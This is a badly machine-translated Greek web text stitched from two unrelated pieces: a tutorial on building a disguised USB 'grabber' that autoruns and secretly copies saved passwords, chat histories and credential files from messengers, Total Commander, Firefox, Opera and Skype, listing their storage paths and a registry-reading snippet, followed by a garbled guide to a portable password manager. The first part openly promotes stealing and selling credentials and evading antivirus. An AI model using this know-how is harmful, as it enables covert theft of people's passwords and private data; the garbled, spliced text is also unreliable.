    Προσπαθήστε να εκτελέσετε την εφαρμογή μας και να εισαγάγετε μια μονάδα flash USB. Μετά από λίγα δευτερόλεπτα (ανάλογα με τα σκελίδες της μονάδας flash), ολόκληρο το περιεχόμενο της μονάδας USB μεταφέρθηκε στο φάκελο από το οποίο ξεκίνησε μια φρεσκοψημένη εφαρμογή.

    USB grabber.

    Τώρα εξετάστε το αντίθετο έργο και μιλήστε για τις αποχρώσεις της δημιουργίας του λεγόμενου. Flashki grabber. Η αρχή της δημιουργίας ακριβώς του ίδιου. Πρέπει να γράψετε μια απλή εφαρμογή που θα ξεκινήσει αυτόματα μετά την εγκατάσταση της μονάδας flash.

    Κατά τη διάρκεια της λειτουργίας, η εφαρμογή θα είναι κακή από τη λέξη-κλειδιά του μητρώου / λέξεις-κλειδιά στις οποίες τα δημοφιλή προγράμματα αποθηκεύουν αποθηκευμένους κωδικούς πρόσβασης και μπορούν να αντιγραφούν σε έναν από τους φακέλους τους όσο το δυνατόν. Προκειμένου ο διευθυντής της αυτοκινητοβιομηχανίας να προκαλέσει υποψία ενός φτωχού χρηστών, να ανησυχείτε να το καλύψει καλά. Για παράδειγμα, κάτω από το μενού εκκίνησης.

    Μάλλον γνωρίζετε ότι η λεγόμενη φορητή έκδοση των εφαρμογών έχει πλέον γίνει πολύ δημοφιλής, δηλαδή, τα προγράμματα μπορούν να λειτουργήσουν απευθείας από τη μονάδα flash. Αυτό είναι καλύτερο να παίξετε. Δημιουργώντας ένα πρόγραμμα στο κατάλληλο στυλ και για την ειλικρίνεια, πετάξτε διάφορα κουμπιά σχεδιασμένα για να εκτελούν οποιαδήποτε προγράμματα. Η επιλογή σχεδιασμού μου εμφανίζεται στην εικόνα.

    Πώς θα ληστέψουμε;

    Θα πω αμέσως ότι οι ενέργειες Super-Hacker δεν χρειάζεται να κάνουν εδώ. Τα περισσότερα προγράμματα αποθηκεύουν προσωπικά δεδομένα στα έγγραφα και τους ρυθμίσεις \\ χρήστη \\ δεδομένα εφαρμογών \\% προγραμματισμού στο πρόγραμμα% ή στο μητρώο. Στο πλαίσιο του προγράμματος υποδηλώνει οποιοδήποτε πρόγραμμα. Εάν συναντήσετε την πρώτη επιλογή, θα πρέπει να χρησιμοποιήσετε την ήδη γνωστή κατηγορία XDirectory (ή τυποποιημένες μεθόδους εργασίας με αρχεία) και να αντιγράψετε όλα όσα χρειάζεστε μαζί του. Στη δεύτερη περίπτωση, θα πρέπει να συνεργαστείτε με το μητρώο. Ένα παράδειγμα αντιγραφής αρχείων δεν θα αντιμετωπίσει (θεωρήσαμε ήδη), αλλά πώς να αλληλεπιδράσετε με τα εργαλεία μητρώου .NET - θα εμφανιστεί τώρα (στο παράδειγμα προσδιορισμού της διαδρομής προς τον φάκελο TC):

    Registrakey readey \u003d registry.currentuser.opensubkey ("λογισμικό \\\\ ghisler \\\\ συνολικός διοικητής"); Πλήκτρο String \u003d (String) readkey.getvalue ("installdir");

    Αυτό είναι όλο. Ο κώδικας δεν θα. Αυτές οι γνώσεις πρέπει να είναι αρκετές για να τραβήξετε αρχεία με πολύτιμες πληροφορίες. Για να κάνετε μια μικρή εργασία ανακούφισης, προετοίμασα μια λίστα με τα πιο δημοφιλή προγράμματα και ζωγράφισα όλα τα μονοπάτια με τα οποία αποθηκεύουν τα αποθηκευμένα δεδομένα χρήστη.

    Mail.Apent

    Mail.ru Messenger είναι πλέον πολύ δημοφιλής στους συνηθισμένους μνημόνους χρήστες (ειδικά σε γυναίκες). Οι στόχοι είναι σαφείς, τα καθήκοντα παραδίδονται, οπότε μας ενδιαφέρει:

  • Ιστορικό. Ολόκληρη η ιστορία των καταστημάτων της αλληλογραφίας του χρήστη MA στα έγγραφα και Ρύθμιση \\% των χρηστών% \\ Appication Data \\ Mra \\ βάσης. Ο φάκελος βάσης έχει ένα αρχείο mRA.DBS.. Αυτό είναι, αυστηρά, υπάρχει ένα αρχείο ιστορίας.
  • Λίστα επαφών. Η λίστα επαφών βρίσκεται στον λογαριασμό χρήστη του φακέλου MRA \\%% \\ Clist5.txt. Γνωρίστε, οι χρήστες που εργάζονται με το Mail.Apent μπορεί να είναι κάπως (ή ένας μόνο χρήστης μπορεί να έχει πολλά καταλύματα). Επομένως, το WISP από όλα θα αντιγράψει όλους τους φακέλους που περιέχουν το σύμβολο "@" στον τίτλο.
  • Κωδικός πρόσβασης. Ο κωδικός πρόσβασης (με μεγαλύτερη ακρίβεια, το hash) από τον λογαριασμό χρήστη αναπτύσσεται στο μητρώο στο δρόμο - HKCU \\ Software \\ mail.ru \\ Agent \\ Magent_Logins2 \\% Λογαριασμός% στην παράμετρο #### Κωδικός πρόσβασης.
  • gtalk.

    Εταιρία Παρατετατώ Δημιουργεί βολικά και λειτουργικά προϊόντα, μεταξύ των οποίων υπάρχει ένας πελάτης gabber - gtalk.. Σήμερα gtalk. Δεν είναι πολύ δημοφιλές. Σε κάθε δεύτερο υπολογιστή, δεν είναι εγκατεστημένο, αλλά μερικές φορές είναι ακόμα βρεθεί και να είναι το θέμα, είναι καλύτερα να διδάξει αμέσως το πρόγραμμά μας για να πάρετε τους κωδικούς πρόσβασης και από αυτό το messianger. Κωδικοί πρόσβασης από όλους τους λογαριασμούς GTalk Store στο μητρώο - HHEY_CURRENT_USER \\ Λογισμικό \\ Google \\ Google Talk \\ Λογαριασμοί. Σε αυτό το νήμα, όλοι οι λογαριασμοί παρατίθενται σύμφωνα με τους οποίους η είσοδος έχει γίνει ποτέ gtalk.. Οι κωδικοί πρόσβασης στο λογαριασμό καταγράφονται στην παράμετρο String PW.

    Συνολικός διοικητής.

    Συνολικός διοικητής. - Σίγουρα, ο πιο δημοφιλής διαχειριστής αρχείων. Οι λειτουργίες στο πρόγραμμα περιέχουν ένα κατά προσέγγιση αυτοκίνητο και ένα μικρό καλάθι (και όσο πολλοί μπορούν να τοποθετηθούν σε αυτό με επιπλέον plugins). Μας ενδιαφέρει μόνο στον ενσωματωμένο πελάτη FTP. Χρησιμοποιεί πολλούς και κωδικούς πρόσβασης, φυσικά, διατηρούν.

    Το TC σε αντίθεση με πολλά άλλα προγράμματα δεν αποθηκεύει κωδικούς πρόσβασης στο μητρώο και χρησιμοποιούν τα παλιά καλά αρχεία INI. Κωδικοί πρόσβασης, καθώς και όλα τα απαραίτητα δεδομένα για τη σύνδεση με διακομιστές (IP, θύρα, όνομα χρήστη κλπ.) Συνολικός διοικητής. Καταστήματα στο αρχείο wcx_ftp.ini.που βρίσκεται αθώα στο φάκελο του προγράμματος. Διαδρομή προς τον κατάλογο στον οποίο εγκαταστάθηκε Συνολικός διοικητής.Μπορείτε να μάθετε από το μητρώο. Ploy στο HKEY_CURRENT_USER \\ Λογισμικό \\ Ghisler \\ Συνολικός υποκατάστημα διοικητών.

    Firefox.

    Σήμερα, το πρόγραμμα περιήγησης δεν είναι απλά ένα πρόγραμμα για web ταξίδια, αλλά μια ολόκληρη συνδυάζουν, το οποίο εκτός από μια ποικιλία από ευκαιρίες διατηρεί πολλά εμπιστευτικών πληροφοριών. Ένα τυπικό παράδειγμα είναι μια φόρμα Web. Το 99% των σύγχρονων τοποθεσιών απαιτούν εγγραφή. Θυμηθείτε και συνεχώς κρατήστε το κεφάλι σας Σύνδεση / Κωδικός πρόσβασης για κάθε τοποθεσία - η εργασία είναι εξωπραγματική, ειδικά εάν είστε ένας προηγμένος χρήστης και η πλοήγηση στο διαδίκτυο δεν περιορίζεται σε έναν "συμμαθητές" και "vkontakte".

    Οι προγραμματιστές διευκολύνει τη ζωή των χρηστών και των ενσωματωμένων τις λεγόμενες «αποθετήρια κωδικός πρόσβασης» στα προγράμματα. Έχω εγγραφεί, πήγα κάτω από το λογαριασμό μου, διέταξε το πρόγραμμα περιήγησης να θυμάται τα διαπιστευτήρια - και ξέχασε. Την επόμενη φορά που επισκεφθήκατε μόνο ένα ζευγάρι κλικ με το ποντίκι και είστε ήδη στην περιοχή. Δεδομένου ότι το πρόγραμμα περιήγησης διατηρεί τους κωδικούς πρόσβασης, αυτό σημαίνει ότι έχουμε την ευκαιρία να σύρετε όλη τη βάση του.

  • sessionStore.js - Το αρχείο περιέχει όλες τις αποθηκευμένες συνεδρίες.
  • signons3.txt - κρυπτογραφημένοι κωδικοί πρόσβασης (για την τρίτη έκδοση του FF).
  • signons.sqlite - βάση sqlite που περιέχει όλους τους κρυπτογραφημένους κωδικούς πρόσβασης.
  • Το πλήκτρο 3.DB είναι ένα κλειδί βάσης δεδομένων για πιστοποιητικά.
  • Όλα αυτά τα αρχεία βρίσκονται στο ήδη γνωστό σας έγγραφο και ρυθμίσεις \\% USERNAME% \\ DATA \\ Mozilla \\ Firefox \\ Προφίλ \\% Όνομα προφίλ%%.

    ΛΥΡΙΚΗ ΣΚΗΝΗ.

    ΛΥΡΙΚΗ ΣΚΗΝΗ. - Browser, το οποίο είναι πολύ δημοφιλές μεταξύ των ρωσικών χρηστών. Φυσικά, δεν μπορούμε να το αφήσουμε χωρίς προσοχή. Έτσι, με την όπερα η κατάσταση είναι περίπου η ίδια με τον Firefox. Όλοι οι κωδικοί πρόσβασης που είναι αποθηκευμένοι στο πρόγραμμα περιήγησης αποθηκεύονται στο έγγραφο και τις ρυθμίσεις \\% USERNAME% \\ DATA DATA \\ OPERA \\ Προφίλ στο αρχείο Wand.dat. Αποδεικνύεται ότι ανιχνεύεται η όπερα, θα ενεργήσουμε καθώς και στην περίπτωση του Firefox..

    Skype.

    Η δημοτικότητα του Skype μεγαλώνει κάθε μέρα. Πολλά από αυτά δεν χρησιμοποιούνται ως μέσο λήψης κλήσεων, αλλά για μια βολική συνομιλία. Όλα τα οικεία δεδομένα, όπως θα πρέπει να περιμένετε, βρίσκονται στο προφίλ χρήστη (εκεί, όπου αποθηκεύουν την όπερα ή την FF τους). Για την "ιδιωτικοποίηση" τους θα πρέπει να αντιγράψετε το προφίλ του χρήστη από το έγγραφο and Settings \\% username% \\ Application Data \\ Skype \\ και εξάγουν το υποκατάστημα μητρώου - HKEY_CURRENT_USER \\ Software \\ Skype \\ ProtectedStorage.

    Qip.

    Όπως και τα περισσότερα από τα περιγράφηκε προηγουμένως προγράμματα, QIP όλους τους αποθηκευμένους κωδικούς πρόσβασης καταστήματα στο Application Data \\ QIP.

    Η αντιγραφή ολοκληρώθηκε

    Η τεχνολογία .NET απλουστεύει έντονα την εργασία, ως αποτέλεσμα της οποίας ολόκληρη η κωδικοποίηση κόπηκε σε μια κλήση σε διάφορες μεθόδους. Φυσικά, μπορείτε να πείτε ότι δεν είναι δροσερό και ότι τέτοια πράγματα είναι πιο αποτελεσματικά για να γράψετε στο Winapi ή το ASM "E. Σε κάτι, συμφωνώ μαζί σας, αλλά λαμβάνοντας υπόψη, στο Winapi και, επιπλέον, στο Asme να γράψει ένα τέτοιο πρόγραμμα και έτσι δεν θα είναι σε θέση να γρήγορα γρήγορα, ενώ άλλοι γράφουν κώδικα χιλιόμετρο, θα συλλέξουμε συγκομιδή Καλή τύχη στον προγραμματισμό, και εάν έχετε οποιεσδήποτε ερωτήσεις, -.. σας ζητώ, γράφουν για το σαπούνι.

    Μην ξεχνάτε, πολλοί χρήστες αποθηκεύουν εμπιστευτικές πληροφορίες στο φάκελο των εγγράφων μου. Ελάχιστο, ενδέχεται να υπάρχουν ενδιαφέροντα έγγραφα εργασίας και μερικές φορές ολόκληρα αρχεία με κωδικούς πρόσβασης. Εγώ στο χρόνο μου (στην πρώην δουλειά) ανακάλυψα ένα τεράστιο μορφοποιημένο αρχείο με κωδικούς πρόσβασης σε πελάτες σε ένα διαμέρισμα.

    Ως αληθινός φίλος, θα πρέπει να βοηθήσετε όλους αυτούς τους ανθρώπους με ένα αντίγραφο ασφαλείας των εμπιστευτικών πληροφοριών τους.

    Σε πολλά φόρουμ χάκερ, πολλές διαφημίσεις για την πώληση λογισμικού αυτού του είδους. Διαφορετικές τιμές - από $ 10 έως $ 100. Βελτίωση των παραδειγμάτων που εξετάζονται στο άρθρο, μπορείτε να κερδίσετε την κρούστα του μαύρου ψωμιού με χαβιάρι. Επαναλαμβάνω, το κύριο πράγμα που πηγαίνετε στην περίπτωση δημιουργικά και όλα σίγουρα θα λειτουργήσουν. Και πάλι, τα αντιιικά δεν ανιχνεύονται.).

    Προειδοποίηση!

    Χρησιμοποιούμε αυτό το πρόγραμμα αποκλειστικά για την έγκαιρη δημιουργία αντιγράφων ασφαλείας των περιεχομένων των μονάδων Flash στους κωδικούς πρόσβασης δίσκου και δημιουργίας αντιγράφων ασφαλείας στη μονάδα flash USB. Και τι σκέφτηκες; Η παράνομη χρήση αυτού του λογισμικού τιμωρείται!

    Πολλές εταιρείες, συμπεριλαμβανομένης της Sony και της Adobe, έχουν ήδη γίνει θύματα χάκερ που έχουν κλέψει εκατομμύρια κωδικούς πρόσβασης και άλλα δεδομένα χρηστών. Μια ανάλυση αυτών των πληροφοριών έδειξε ότι πολλοί χρήστες συχνά χρησιμοποιούν είτε αναξιόπιστους κωδικούς πρόσβασης όπως το "123456" ή τον ίδιο κωδικό πρόσβασης για πολλές υπηρεσίες. Είναι εξαιρετικά διευκολύνει τους χάκερ της αποστολής τους, και την ίδια στιγμή, όπως απροσεξία μπορεί να γίνει κατανοητό: ο οποίος είναι σε θέση να θυμούνται περισσότερο από μια ντουζίνα δύσκολο κωδικούς πρόσβασης;

    Μια απλή λύση μπορεί να είναι ένα κομμάτι χαρτί κολλημένο κάτω από το πληκτρολόγιο. Κανένας χάκερ δεν μπορεί να φάει σε αυτόν, αλλά θα πρέπει να παρακολουθείτε συνεχώς τους ανθρώπους που βρίσκονται κοντά στον υπολογιστή σας. Και από αυτό το φύλλο δεν υπάρχει καμία χρήση αν θέλετε να εισάγετε το λογαριασμό σας με τον υπολογιστή κάποιου άλλου.

    Δωρεάν διαθήκη 2 φορητό εργαλείο λύνει αυτό το δίλημμα. Για το έργο του, θα χρειαστείτε μόνο μια μονάδα flash USB με 10 MB ελεύθερου χώρου στο οποίο εγκαθιστάτε ένα βοηθητικό πρόγραμμα. Στο μέλλον, θα πρέπει να θυμάστε μόνο έναν κωδικό πρόσβασης - από την προστατευόμενη περιοχή της μονάδας flash. Μετά από όλα, διατηρεί τα δεδομένα της DEADASS να εισέλθουν στις υπηρεσίες Web με τη μορφή κωδικοποιημένης τραπεζικής δεδομένων που προστατεύονται από τον κύριο κωδικό πρόσβασης.

    Troyans, λαμβάνοντας κωδικούς πρόσβασης, δεν θα μπορέσουν να σηκώσουν τίποτα. Και επειδή δεν χρειάζεται πλέον να διατηρείτε τη μνήμη των δεκάδων κωδικών πρόσβασης, μπορείτε να χρησιμοποιήσετε ένα νέο για κάθε υπηρεσία Web, πραγματικά αξιόπιστο κωδικό πρόσβασης. Τώρα θα σας πούμε λεπτομερώς πώς να χρησιμοποιήσετε το Deadass.

    Πως να το κάνεις

    1 Τοποθετήστε τον κωδικό ασφαλή


    Τοποθετήστε τον κωδικό ασφαλή

    Τοποθετήστε τη μονάδα Flash USB στον υπολογιστή, δημιουργήστε ένα νέο φάκελο σε αυτό και αντιγράψτε τα περιεχόμενα του αρχείου με το λογισμικό Deadass εκεί. Εκτελέστε το πρόγραμμα Deadass.exe. Μετά την εκκίνηση, ενεργοποιήστε την αυτόματη αναζήτηση για ενημερώσεις κάνοντας κλικ στο αναδυόμενο παράθυρο για να "ενεργοποιήσετε". Στη συνέχεια, επιλέξτε "Προβολή | Αλλαγή γλώσσας και κάντε κλικ στο "Πάρτε περισσότερες γλώσσες".

    Κατεβάστε το αρχείο ρωσικής γλώσσας από τον ιστότοπο ανοίγματος κάνοντας κλικ στο «Ρωσικό | 2.25+. " Αποσυσκευάστε τα περιεχόμενα του αρχείου στη μονάδα USB. Κάντε κλικ στην επιλογή "Προβολή | Αλλαγή γλώσσας, "Επιλέξτε" Ρωσική "και κάντε επανεκκίνηση πατώντας το κουμπί" Ναι ".

    2 Δημιουργήστε μια νέα βάση δεδομένων κωδικού πρόσβασης


    Δημιουργήστε μια νέα βάση δεδομένων κωδικού πρόσβασης

    Επιλέξτε "Αρχείο | Νέο "και καθορίστε μια μονάδα USB ως αποθήκευση κωδικού πρόσβασης. Στο επόμενο παράθυρο, το πρόγραμμα θα σας ζητήσει να ορίσετε τον κύριο κωδικό πρόσβασης. Θα χρειαστεί να εισαχθεί κάθε φορά που ξεκινά η διακόσμηση.

    3 Ενεργοποιήστε την προστατευμένη λειτουργία


    Ενεργοποιήστε την προστατευμένη λειτουργία

    Στο Trojan δεν μπόρεσε να μετρήσετε τον κωδικό πρόσβασής σας για το Deadass, θα πρέπει να χρησιμοποιήσετε την προστατευμένη λειτουργία προγράμματος, παρόμοια με την UAC στα Windows 7. Για να το κάνετε αυτό, πηγαίνετε στην υπηρεσία DEADASS στην υπηρεσία | Ρυθμίσεις | Ασφάλεια ", μετακινηθείτε στο κάτω μέρος του παραθύρου και ελέγξτε το πλαίσιο δίπλα στο" Εισάγετε τον κύριο κωδικό πρόσβασης σε ασφαλή λειτουργία ".

    4 Συμπληρώστε τους κωδικούς πρόσβασης βάσης δεδομένων


    Συμπληρώστε τους κωδικούς πρόσβασης βάσης δεδομένων

    Κλαδία μπορεί να ταξινομήσει κωδικούς από ομάδες. Από προεπιλογή, έχετε τέτοιες ομάδες ως "OS" ή "Internet" στον νέο σας κωδικό τραπεζικής. Για να δημιουργήσετε μια νέα καταχώρηση, επιλέξτε την κατάλληλη ομάδα (ή να δημιουργήσετε ένα νέο), κάντε κλικ στην λευκή περιοχή προς τα δεξιά με το δεξί κουμπί του ποντικιού και στη συνέχεια - με "Προσθήκη εγγραφής".

    Συμπληρώστε όλα τα πεδία και κάντε κλικ στο OK. Δεδομένου ότι δεν χρειάζεται πλέον να θυμάστε τους κωδικούς πρόσβασης για να εισαγάγετε κάθε λογαριασμό, μπορείτε να ορίσετε νέο, πιο περίπλοκο, το οποίο μπορεί να δημιουργηθεί, για παράδειγμα, στον ιστότοπο Passwort-generator.com.

    5 Χρησιμοποιήστε αυτόματη εξουσιοδότηση


    Εάν θέλετε να συνδεθείτε με το Deadass, ανοίξτε την ομάδα στην οποία αποθηκεύεται ο κατάλληλος κωδικός πρόσβασης. Κάντε δεξί κλικ στην κατάλληλη καταχώρηση στο KeePass Κωδικός Αποθήκευση και επιλέξτε «Έναρξη Autonoming» στη λίστα. Μετά από αυτό, το πρόγραμμα θα μεταφέρει τα δεδομένα του προγράμματος περιήγησης και το πρόγραμμα περιήγησης θα ανοίξει ένα νέο παράθυρο όπου θα εισαγάγετε το λογαριασμό σας.

    Παρακαλείστε να σημειώσετε ότι στο πεδίο "URL", πρέπει να εισαγάγετε τη διεύθυνση URL που εισάγετε συνήθως στο πρόγραμμα περιήγησης για εξουσιοδότηση, διαφορετικά δεν θα λειτουργείτε αυτόματα να εισάγετε τον κωδικό πρόσβασης μέσω της Keepass.

    6 Να επεκτείνετε τις δυνατότητες της διαχείρισης


    Να επεκτείνετε τις δυνατότητες της διαχείρισης

    Αν θέλετε να επεκτείνετε τη λειτουργικότητα της διατροπέας, μεταβείτε στην επιλογή "Υπηρεσία | Ενότητες | Περισσότερες μονάδες ", μετά την οποία θα μεταφερθούν στον ιστότοπο με χρήσιμες επεκτάσεις (οι συστάσεις μας μπορούν να βρεθούν στον παραπάνω πίνακα). Τώρα κάντε κλικ στο όνομα του ονόματος, κάντε λήψη και αποσυσκευάστε το στη μονάδα flash.

    Εκτελέστε το Keepass ξανά και πηγαίνετε στην "Υπηρεσία | Ενότητες. Στο κάτω μέρος, θα εμφανιστεί μια λίστα διαθέσιμων προσωρινών plug-ins (μερικά από αυτά μπορούν να διαμορφωθούν).

    Καλύτερες επεκτάσεις για Deadass

    Ας υποθέσουμε ότι σκαπανέας σας με τους κωδικούς πρόσβασης με επιπλέον χαρακτηριστικά, όπως η λειτουργία δημιουργίας αντιγράφων ασφαλείας ή μεταφορά κωδικό πρόσβασης για κινητά τηλέφωνα.

    Ονομα

    Περιγραφή

    Databasebackup. Ορίζει την τράπεζα προστασία των κωδικών πρόσβασης σε περίπτωση που η μονάδα USB θα κλαπεί ή θα χαθεί.
    Δίκλινο Cipher.
    Γεγονός. Προσθέτει έναν αλγόριθμο κωδικοποίησης που είναι σχεδόν αδύνατο να hack? Σημειώστε ότι εξαιτίας αυτού, η Deplass θα λειτουργήσει πιο αργά.
    Keyxchanger. Προσθέτει έναν αλγόριθμο κωδικοποίησης που είναι σχεδόν αδύνατο να hack? Σημειώστε ότι εξαιτίας αυτού, η Deplass θα λειτουργήσει πιο αργά.
    Κεφάλαιο Ανοίγει τις αγαπημένες σας τοποθεσίες πιέζοντας το κουμπί και καθιστά αυτόματα τα δεδομένα εγγραφής σας.